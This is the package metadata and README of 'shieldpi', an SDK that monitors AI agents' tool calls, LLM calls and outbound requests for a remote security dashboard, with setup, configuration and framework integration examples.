Metadata-Version: 2.4
Name: shieldpi
Version: 0.2.0
Summary: Runtime EDR for AI agents — zero-code-change monitoring for LangChain, LangGraph, OpenAI Assistants, and the Anthropic SDK
Author-email: ShieldPi <support@shieldpi.io>
License: Apache-2.0
Project-URL: Homepage, https://shieldpi.io
Project-URL: Documentation, https://docs.shieldpi.io/sdks/python
Project-URL: Repository, https://github.com/ShieldPi1/shieldpi-watchtower
Keywords: llm,security,agents,monitoring,ai-security
Classifier: Development Status :: 4 - Beta
Classifier: Intended Audience :: Developers
Classifier: License :: OSI Approved :: Apache Software License
Classifier: Programming Language :: Python :: 3
Classifier: Programming Language :: Python :: 3.9
Classifier: Programming Language :: Python :: 3.10
Classifier: Programming Language :: Python :: 3.11
Classifier: Programming Language :: Python :: 3.12
Classifier: Topic :: Security
Requires-Python: >=3.9
Description-Content-Type: text/markdown
Requires-Dist: httpx>=0.24.0
Provides-Extra: langchain
Requires-Dist: langchain-core>=0.1.0; extra == "langchain"
Requires-Dist: langchain>=0.1.0; extra == "langchain"
Provides-Extra: langgraph
Requires-Dist: langgraph>=0.2.0; extra == "langgraph"
Provides-Extra: openai
Requires-Dist: openai>=1.40.0; extra == "openai"
Provides-Extra: anthropic
Requires-Dist: anthropic>=0.25.0; extra == "anthropic"
Provides-Extra: all
Requires-Dist: langchain-core>=0.1.0; extra == "all"
Requires-Dist: langchain>=0.1.0; extra == "all"
Requires-Dist: langgraph>=0.2.0; extra == "all"
Requires-Dist: openai>=1.40.0; extra == "all"
Requires-Dist: anthropic>=0.25.0; extra == "all"
Provides-Extra: dev
Requires-Dist: pytest>=7; extra == "dev"
Requires-Dist: pytest-asyncio>=0.21; extra == "dev"

# ShieldPi — Runtime EDR for AI Agents

[![PyPI](https://img.shields.io/pypi/v/shieldpi.svg)](https://pypi.org/project/shieldpi/)
[![Python](https://img.shields.io/pypi/pyversions/shieldpi.svg)](https://pypi.org/project/shieldpi/)
[![License](https://img.shields.io/pypi/l/shieldpi.svg)](https://github.com/ShieldPi1/shieldpi-watchtower)

Zero-code-change monitoring for AI agents. Every tool call, LLM call, file read, and outbound request your agent makes streams to ShieldPi's detectors in real time — the same way EDR agents stream endpoint events to a SIEM.

## The 60-second setup

```bash
pip install "shieldpi[all]"
export SHIELDPI_SDK_KEY=shpi_live_...   # get one at https://shieldpi.io/dashboard
```

```python
# Add one import at the top of your agent process:
import shieldpi.auto

# Use LangChain / LangGraph / OpenAI Assistants / Anthropic SDK normally.
from langchain.agents import AgentExecutor
agent = AgentExecutor(...)
agent.invoke({"input": "..."})   # every tool call + LLM call is captured
```

That's it. Open https://shieldpi.io/dashboard/agent-monitor to see the live event stream and any alerts the detectors fire.

## What gets captured

| Agent action | What ShieldPi sees | Detector that scores it |
|--------------|--------------------|-------------------------|
| User sends a message | `user_message` event | `pattern_match` scans for jailbreak strings |
| Agent calls a tool | `tool_call` event with args | `analyzer` categorizes (destructive / exfil / credential_access) |
| Agent reads a file | `tool_call` args with `path` | `pattern_match` catches path traversal |
| Agent makes HTTP request | `tool_call` with URL | `trajectory` catches `read→exfil` kill chains |
| Agent writes to memory | `memory_write` event | `memory_integrity` detects tampering |
| Agent responds to user | `final_response` event | `response_leak_scanner` checks for leaked secrets |

Six detectors run in parallel on every event: **pattern_match**, **trajectory**, **analyzer**, **memory_correlation**, **memory_integrity**, **response_leak_scanner**.

## Supported frameworks

| Framework | Auto-patch | Manual handler | Optional dep |
|-----------|------------|----------------|-------------|
| LangChain (AgentExecutor) | ✅ | ✅ | `pip install shieldpi[langchain]` |
| LangChain (LCEL tools) | ✅ (BaseTool hook) | ✅ | `pip install shieldpi[langchain]` |
| LangGraph | ✅ | ✅ | `pip install shieldpi[langgraph]` |
| OpenAI Assistants API | ✅ | — | `pip install shieldpi[openai]` |
| OpenAI Chat Completions w/ tools | ✅ | — | `pip install shieldpi[openai]` |
| Anthropic SDK (tool use) | ✅ | ✅ | `pip install shieldpi[anthropic]` |
| Custom agents (no framework) | — | ✅ | base install |

## Explicit configuration (optional)

If you want to override env-var defaults:

```python
import shieldpi.auto

shieldpi.auto.configure(
    sdk_key="shpi_live_...",           # or SHIELDPI_SDK_KEY env
    agent_name="invoice-bot",           # or SHIELDPI_AGENT_NAME env
    stated_goal="help users file invoices",
    frameworks=["langchain", "anthropic"],  # or SHIELDPI_AUTO_INSTRUMENT=langchain,anthropic
)
```

Environment variables:

| Variable | Purpose |
|----------|---------|
| `SHIELDPI_SDK_KEY` | Your SDK key (starts with `shpi_live_`). **Required.** |
| `SHIELDPI_BASE_URL` | Override the API base URL (defaults to production). |
| `SHIELDPI_AGENT_NAME` | Logical name for this agent. Default: `unnamed-agent`. |
| `SHIELDPI_AGENT_GOAL` | Stated goal (helps detectors flag off-goal behavior). |
| `SHIELDPI_AUTO_INSTRUMENT` | Comma-separated framework allowlist. Default: all installed. |

## Manual integration

For custom agents or full control:

```python
from shieldpi import Monitor

monitor = Monitor(sdk_key="shpi_live_...")
with monitor.start_session(
    agent_name="invoice-bot",
    stated_goal="help users file invoices",
) as session:
    session.log_user_message("How do I file a Q1 invoice?")
    session.log_tool_call("search_docs", {"query": "Q1 invoice filing"})
    session.log_tool_result("search_docs", {"results": [...]})
    session.log_final_response("Here's how to file a Q1 invoice...")
```

### LangChain (manual)

```python
from shieldpi import Monitor
from shieldpi.hooks.langchain import ShieldPiCallbackHandler

monitor = Monitor(sdk_key="shpi_live_...")
handler = ShieldPiCallbackHandler(monitor, agent_name="my-agent")
agent.invoke({"input": "..."}, config={"callbacks": [handler]})
```

### Anthropic SDK (manual)

```python
from anthropic import Anthropic
from shieldpi import Monitor
from shieldpi.hooks.anthropic import monitored_tool_use

anth = Anthropic()
monitor = Monitor(sdk_key="shpi_live_...")

with monitored_tool_use(monitor, agent_name="invoice-bot") as session:
    session.log_user_message("Help me file an invoice")
    response = anth.messages.create(
        model="claude-opus-4-20250514",
        messages=[{"role": "user", "content": "Help me file an invoice"}],
        tools=[...],
    )
    session.observe_anthropic_response(response)
```

## Safety guarantees

The SDK is built to never crash your agent:

- Every HTTP call is fire-and-forget (background worker, bounded queue).
- Monitoring failures are logged at WARNING level; they never raise to your agent.
- If `SHIELDPI_SDK_KEY` is missing, `import shieldpi.auto` logs once and does nothing.
- All patches are idempotent — double-import won't double-wrap.
- Patches gracefully no-op when the target framework isn't installed.

## What's new in 0.2.0

- **`shieldpi.auto`** — one-line zero-code-change monitoring for LangChain, LangGraph, OpenAI, and Anthropic.
- **LangGraph support** — first-class patching of `Pregel.invoke/ainvoke/stream/astream`.
- **OpenAI Assistants support** — new patch for `client.beta.threads.runs.create_and_poll` and Chat Completions with tools.
- **Import hook** — frameworks imported AFTER `shieldpi.auto` are still patched.
- **Idempotent patches** — safe to re-import or reconfigure at runtime.

## Links

- Dashboard — https://shieldpi.io/dashboard/agent-monitor
- Docs — https://shieldpi.io/docs/live-agent-monitor
- Scanner package — [`shieldpi-mcp`](https://pypi.org/project/shieldpi-mcp/) (MCP server for Claude Desktop / Cursor / Continue)

## License

Apache-2.0
